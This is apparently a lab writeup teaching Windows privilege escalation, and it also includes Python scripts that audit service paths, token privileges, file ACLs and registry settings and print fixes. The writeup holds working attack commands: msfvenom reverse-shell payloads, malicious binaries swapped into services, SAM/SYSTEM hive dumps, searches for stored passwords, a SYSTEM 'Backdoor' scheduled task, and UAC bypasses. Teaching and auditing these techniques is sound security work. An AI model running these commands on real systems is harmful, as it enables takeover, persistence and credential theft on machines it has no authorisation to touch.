Windows PrivEsc

Difficulty: intermediate | Duration: 1h 30m | Writeup

Practice Windows privilege escalation

Learning Objectives

  • Service exploitation
  • Registry attacks
  • Token impersonation
  • DLL hijacking

Windows Privilege Escalation covers techniques to elevate from a standard user to Administrator or SYSTEM on Windows machines. From service misconfigurations to token manipulation, these skills are essential for Windows penetration testing.

Windows privilege escalation differs significantly from Linux. Instead of SUID binaries, you'll exploit services, tokens, and the registry. SYSTEM is the highest privilege level - even above Administrator!

Initial Enumeration

cmd
# System Information
systeminfo
hostname
whoami /all

# User and Group Info
net user
net user username
net localgroup
net localgroup Administrators

# Network Information
ipconfig /all
netstat -ano
arp -a

# Installed Software
# (Win32_Product enumeration is slow and triggers an MSI consistency check on every package)
wmic product get name,version
reg query HKLM\SOFTWARE

# Running Services
sc query
wmic service get name,displayname,pathname,startmode

# Scheduled Tasks
schtasks /query /fo LIST /v

WinPEAS

WinPEAS automates Windows enumeration. Upload and run it for comprehensive privilege escalation checks with color-coded output.

Service Exploitation

Unquoted Service Paths

cmd
# Find unquoted paths (cmd syntax: a literal double quote for findstr is written as """)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Example vulnerable path:
# C:\Program Files\My Program\service.exe

# Windows tries to execute in order:
# C:\Program.exe
# C:\Program Files\My.exe
# C:\Program Files\My Program\service.exe

# If we can write to C:\Program Files\:
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > My.exe
copy My.exe "C:\Program Files\My.exe"
sc stop vulnerable_service
sc start vulnerable_service
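
The search order above can be checked offline against captured wmic output rather than by eye. The following Python audit script is an added example written for this writeup, not code from the original page or any tool it names: it parses the fixed-width output of `wmic service get name,displayname,pathname,startmode`, flags auto-start services whose binary path is unquoted and contains a space, lists the executables Windows would try first, and emits the quoting fix for each. The service names and paths in the sample are constructed.

```python
import re
from typing import Dict, List

# Constructed sample of "wmic service get name,displayname,pathname,startmode"
# output. Service names and paths are made up for this example.
SAMPLE_WMIC_OUTPUT = r"""
Name            DisplayName             PathName                                           StartMode
Spooler         Print Spooler           C:\Windows\System32\spoolsv.exe                    Auto
MyProgramSvc    My Program Service      C:\Program Files\My Program\service.exe            Auto
QuotedSvc       Quoted Service          "C:\Program Files\Other Vendor\svc.exe" -run       Auto
ManualSvc       Manual Service          C:\Program Files\Some Tool\tool.exe                Manual
"""


def parse_wmic_table(text: str) -> List[Dict[str, str]]:
    """Parse wmic's fixed-width table; columns are separated by two or more spaces."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    rows = []
    for line in lines[1:]:
        fields = re.split(r"\s{2,}", line.strip(), maxsplit=len(header) - 1)
        if len(fields) == len(header):
            rows.append(dict(zip(header, fields)))
    return rows


def _binary_part(pathname: str) -> str:
    """Strip service arguments: keep everything up to and including the first '.exe'."""
    m = re.match(r"(?i)(.*?\.exe)", pathname.strip())
    return m.group(1) if m else pathname.strip()


def is_unquoted_with_spaces(pathname: str) -> bool:
    """True when the binary path is unquoted, contains a space and is not under C:\\Windows."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    binary = _binary_part(p)
    return " " in binary and not binary.lower().startswith("c:\\windows\\")


def search_order(pathname: str) -> List[str]:
    """The executables CreateProcess would try, in order, for an unquoted path with spaces."""
    binary = _binary_part(pathname)
    parts = binary.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [binary]


def find_unquoted_auto_services(wmic_text: str) -> List[Dict[str, object]]:
    """Report auto-start services with unquoted paths, plus the quoting fix for each."""
    findings = []
    for row in parse_wmic_table(wmic_text):
        if row["StartMode"].lower() != "auto" or not is_unquoted_with_spaces(row["PathName"]):
            continue
        binary = _binary_part(row["PathName"])
        findings.append({
            "name": row["Name"],
            "path": row["PathName"],
            "search_order": search_order(row["PathName"]),
            # Remediation: re-register the path quoted (sc needs the inner quotes escaped)
            "fix": f'sc config {row["Name"]} binPath= "\\"{binary}\\""',
        })
    return findings


if __name__ == "__main__":
    for f in find_unquoted_auto_services(SAMPLE_WMIC_OUTPUT):
        print(f["name"], f["path"])
        for candidate in f["search_order"]:
            print("   tries:", candidate)
        print("   fix:", f["fix"])
```

Feed it the saved output of the wmic command on a real host and every finding's `fix` line is the remediation to apply; the `search_order` list tells you which parent directories need their ACLs reviewed (only Administrators and SYSTEM should be able to create files there).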

Insecure Service Permissions

cmd
# Check service permissions with accesschk (SysInternals)
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula

# Check specific service
sc qc vulnerable_service

# If SERVICE_CHANGE_CONFIG is allowed:
sc config vulnerable_service binpath= "C:\Users\Public\shell.exe"
sc stop vulnerable_service
sc start vulnerable_service

Weak Service Binary Permissions

cmd
# Check if service binary is writable
icacls "C:\Program Files\Vulnerable\service.exe"

# If writable:
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > service.exe
copy service.exe "C:\Program Files\Vulnerable\service.exe" /Y
sc stop vulnerable_service
sc start vulnerable_service

Registry Exploitation

cmd
# AutoRun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check permissions
accesschk.exe -wvu "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# AlwaysInstallElevated
# If both keys = 1, MSI packages install as SYSTEM!
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Exploit AlwaysInstallElevated
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f msi > shell.msi
msiexec /quiet /qn /i shell.msi

AlwaysInstallElevated is a significant finding! It allows any user to install MSI packages with SYSTEM privileges.

Password Mining

cmd
# Saved credentials
cmdkey /list

# If credentials saved:
runas /savecred /user:admin cmd.exe

# Registry passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

# SAM and SYSTEM (if accessible)
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
# Extract hashes with secretsdump.py or mimikatz

# Unattend files
findstr /si password *.xml *.ini *.txt
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml

Token Impersonation

cmd
# Check privileges
whoami /priv

# Exploitable privileges:
# SeImpersonatePrivilege - PrintSpoofer, JuicyPotato
# SeAssignPrimaryTokenPrivilege - Token manipulation
# SeBackupPrivilege - Backup SAM/SYSTEM
# SeRestorePrivilege - Write to any file
# SeTakeOwnershipPrivilege - Take ownership of files

# SeImpersonatePrivilege exploitation
# PrintSpoofer (Windows 10/Server 2016+)
PrintSpoofer.exe -i -c cmd

# JuicyPotato (older Windows)
JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}

# GodPotato (newer systems)
GodPotato.exe -cmd "cmd /c whoami"
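
The privilege list above is the checklist to run against every service account on a host, not only against the current shell. The Python script below is an added example for this writeup (not code from the page or from any of the tools it names): it parses `whoami /priv` output and reports which of the five privileges listed above the token holds. A "Disabled" state is reported too, because a process can enable any privilege that is present in its token, so Disabled is not a mitigation. The sample output is constructed to look like a typical service account.

```python
from typing import Dict, List

# The privileges the writeup singles out, with the reason it gives for each.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonation (Potato-family abuse)",
    "SeAssignPrimaryTokenPrivilege": "token manipulation",
    "SeBackupPrivilege": "read SAM/SYSTEM via backup semantics",
    "SeRestorePrivilege": "write to any file",
    "SeTakeOwnershipPrivilege": "take ownership of files",
}

# Constructed sample of "whoami /priv" output for a service account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> State ("Enabled"/"Disabled") from 'whoami /priv' output."""
    privs: Dict[str, str] = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):      # the ruler line precedes the data rows
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        fields = line.split()
        # First token is the privilege name, last token is the state;
        # the description in between may contain spaces.
        privs[fields[0]] = fields[-1]
    return privs


def risky_privileges(text: str, enabled_only: bool = False) -> List[Dict[str, str]]:
    """Return the high-risk privileges present in the token, in output order.

    Disabled privileges are included by default: they are still in the token
    and can be switched on by the process itself.
    """
    out = []
    for name, state in parse_whoami_priv(text).items():
        if name not in HIGH_RISK_PRIVILEGES:
            continue
        if enabled_only and state != "Enabled":
            continue
        out.append({"privilege": name, "state": state, "why": HIGH_RISK_PRIVILEGES[name]})
    return out


if __name__ == "__main__":
    for hit in risky_privileges(SAMPLE_WHOAMI_PRIV):
        print(f'{hit["privilege"]:32} {hit["state"]:9} {hit["why"]}')
```

Any account this reports as holding SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege should be treated as SYSTEM-equivalent when you assess the blast radius of a compromised service; that is the same point the "Service Accounts" note below makes for IIS AppPool and MSSQL.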

Service Accounts

IIS AppPool, MSSQL, and other service accounts typically have SeImpersonatePrivilege. If you compromise these, Potato attacks give you SYSTEM!

Scheduled Tasks

cmd
# List scheduled tasks
schtasks /query /fo LIST /v

# Look for:
# - Tasks running as SYSTEM
# - Scripts/binaries that are writable

# Check task binary permissions
icacls "C:\Path\To\Task\Binary.exe"

# If writable, replace with malicious binary
# Task will execute your payload as SYSTEM

# Create scheduled task (if admin)
schtasks /create /sc MINUTE /mo 1 /tn "Backdoor" /tr "C:\Users\Public\shell.exe" /ru SYSTEM
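
Both the "Weak Service Binary Permissions" section and the scheduled-task check above come down to the same question: does a low-privileged principal have write rights on a binary that runs as SYSTEM? Reading icacls output by hand is error-prone, so here is an added Python example (not code from the page or from Sysinternals) that parses the output of `icacls "<path>"`, flags write-capable rights granted to low-privileged principals, and prints the icacls command that resets the ACL. The set of principals treated as low-privileged and the sample ACL are assumptions constructed for the example.

```python
import re
from typing import Dict, List, Set

# Simple and specific icacls rights that let a principal change the file's contents.
WRITE_RIGHTS: Set[str] = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}

# Principals that any local user effectively is (assumption: extend for your environment).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}

# Constructed sample: icacls output for a made-up service binary.
SAMPLE_PATH = r"C:\Program Files\Vulnerable\service.exe"
SAMPLE_ICACLS_OUTPUT = r"""
C:\Program Files\Vulnerable\service.exe NT AUTHORITY\SYSTEM:(I)(F)
                                        BUILTIN\Administrators:(I)(F)
                                        BUILTIN\Users:(I)(RX)
                                        NT AUTHORITY\Authenticated Users:(I)(M)
                                        Everyone:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(text: str, path: str) -> List[Dict[str, object]]:
    """Return one {principal, rights} entry per ACE in 'icacls <path>' output."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):          # first line carries the path before the first ACE
            line = line[len(path):].strip()
        if ":(" not in line:
            continue
        principal, perms = line.split(":(", 1)
        rights: Set[str] = set()
        for group in re.findall(r"\(([^)]*)\)", "(" + perms):
            rights.update(t.strip() for t in group.split(","))   # "(RX,W)" -> RX, W
        aces.append({"principal": principal.strip(), "rights": rights})
    return aces


def writable_by_low_privileged(text: str, path: str) -> List[str]:
    """Principals from LOW_PRIV_PRINCIPALS that hold a write-capable right on the file."""
    hits = []
    for ace in parse_icacls(text, path):
        if "DENY" in ace["rights"]:        # deny ACEs grant nothing
            continue
        if ace["principal"].lower() in LOW_PRIV_PRINCIPALS and ace["rights"] & WRITE_RIGHTS:
            hits.append(ace["principal"])
    return hits


def remediation_command(path: str) -> str:
    """icacls command that strips inherited ACEs and leaves only admins/SYSTEM with write access."""
    return (f'icacls "{path}" /inheritance:r /grant:r "BUILTIN\\Administrators:(F)" '
            f'"NT AUTHORITY\\SYSTEM:(F)" "BUILTIN\\Users:(RX)"')


if __name__ == "__main__":
    bad = writable_by_low_privileged(SAMPLE_ICACLS_OUTPUT, SAMPLE_PATH)
    if bad:
        print("writable by:", ", ".join(bad))
        print("fix:", remediation_command(SAMPLE_PATH))
    else:
        print("ACL looks fine")
```

Run it over the saved icacls output for every binary referenced by an auto-start service or a SYSTEM scheduled task; a single `M` or `W` for Users or Authenticated Users is the finding the two sections above describe. Check the parent directory the same way, since delete-and-replace needs write access there rather than on the file.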

UAC Bypass

cmd
# Check UAC level
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

# Values:
# EnableLUA = 1 (UAC enabled)
# ConsentPromptBehaviorAdmin:
# 0 = Elevate without prompting
# 5 = Prompt for consent

# UAC bypass techniques (when already admin but blocked by UAC):

# Fodhelper bypass
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe

# Eventvwr bypass
reg add HKCU\Software\Classes\mscfile\Shell\Open\command /d "cmd.exe" /f
eventvwr.exe

# Clean up (remove both keys that were added above)
reg delete HKCU\Software\Classes\ms-settings /f
reg delete HKCU\Software\Classes\mscfile /f
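
Two of the registry checks on this page (AlwaysInstallElevated in "Registry Exploitation" and the UAC policy values just above) are decided by reading `reg query` output, so one parser serves both. The Python below is an added example for this writeup (not code from the page): it parses `reg query` output into key/value maps, applies the page's rule that AlwaysInstallElevated only matters when both hives are 1, and summarises the UAC posture from EnableLUA and ConsentPromptBehaviorAdmin. The sample outputs are constructed; the ConsentPromptBehaviorAdmin meanings follow the documented Windows values, of which the page lists 0 and 5.

```python
import re
from typing import Dict

# Documented ConsentPromptBehaviorAdmin values (the page lists 0 and 5).
ADMIN_PROMPT_MEANING = {
    0: "elevate without prompting",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop (Always notify)",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries (default)",
}

# Constructed sample outputs of the reg query commands used on this page.
SAMPLE_HKLM_INSTALLER = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
# reg query prints this when the value is not set at all
SAMPLE_HKCU_INSTALLER = "ERROR: The system was unable to find the specified registry key or value.\n"

SAMPLE_UAC_POLICY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\UIPI
"""


def parse_reg_query(text: str) -> Dict[str, Dict[str, str]]:
    """Map key path -> {value name: data}. Key lines are unindented; values are indented."""
    result: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.startswith("ERROR:"):
            continue
        if not line.startswith(" "):
            current = line.strip()
            result.setdefault(current, {})
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)   # name, type, data
        if current is None or len(parts) < 2:
            continue
        result[current][parts[0]] = parts[2] if len(parts) > 2 else ""
    return result


def dword(data: str) -> int:
    """Convert reg query's REG_DWORD rendering ('0x1') to an int."""
    data = data.strip()
    return int(data, 16) if data.lower().startswith("0x") else int(data or "0")


def always_install_elevated(hklm_text: str, hkcu_text: str) -> bool:
    """True only when BOTH hives set AlwaysInstallElevated = 1, as the page states."""
    def flag(text: str) -> bool:
        for key, values in parse_reg_query(text).items():
            if key.lower().endswith(r"\windows\installer") and "AlwaysInstallElevated" in values:
                return dword(values["AlwaysInstallElevated"]) == 1
        return False
    return flag(hklm_text) and flag(hkcu_text)


def uac_posture(policy_text: str) -> Dict[str, object]:
    """Summarise UAC from the Policies\\System key (Windows defaults assumed for absent values)."""
    keys = parse_reg_query(policy_text)
    vals = next((v for k, v in keys.items() if k.lower().endswith(r"\policies\system")), {})
    enable_lua = dword(vals.get("EnableLUA", "0x1"))
    admin_prompt = dword(vals.get("ConsentPromptBehaviorAdmin", "0x5"))
    return {
        "uac_enabled": enable_lua == 1,
        "admin_prompt": admin_prompt,
        "admin_prompt_meaning": ADMIN_PROMPT_MEANING.get(admin_prompt, "unknown"),
        "auto_elevates": enable_lua == 0 or admin_prompt == 0,
        "always_notify": enable_lua == 1 and admin_prompt in (1, 2),
    }


if __name__ == "__main__":
    print("AlwaysInstallElevated exploitable:",
          always_install_elevated(SAMPLE_HKLM_INSTALLER, SAMPLE_HKCU_INSTALLER))
    print(uac_posture(SAMPLE_UAC_POLICY))
```

The `always_notify` field is the one that matters for the bypasses listed above: the auto-elevation that fodhelper and eventvwr rely on only happens at the default level (5), so setting ConsentPromptBehaviorAdmin to 2 ("Always notify") closes this whole class, and `auto_elevates` being true means UAC is effectively off for administrators.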

Essential Tools

# Enumeration
# - WinPEAS: Automated enumeration
# - Seatbelt: Detailed security checks
# - PowerUp: PowerShell privesc checker
# - accesschk.exe: Permission checking

# Exploitation
# - PrintSpoofer: SeImpersonate exploitation
# - JuicyPotato: Older SeImpersonate exploitation
# - GodPotato: Modern potato attack
# - mimikatz: Credential extraction

# PowerShell (a .ps1 must be imported by path)
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Metasploit
use post/multi/recon/local_exploit_suggester

Knowledge Check

Question 1 of 3: What makes unquoted service paths exploitable?

Key Takeaways

  • Service misconfigurations are the most common Windows privesc vector
  • Unquoted service paths are easy to exploit if you can write to parent directories
  • SeImpersonatePrivilege = Potato attacks = SYSTEM
  • Always check for saved credentials with cmdkey /list
  • AlwaysInstallElevated is a critical finding
  • Run WinPEAS for comprehensive automated enumeration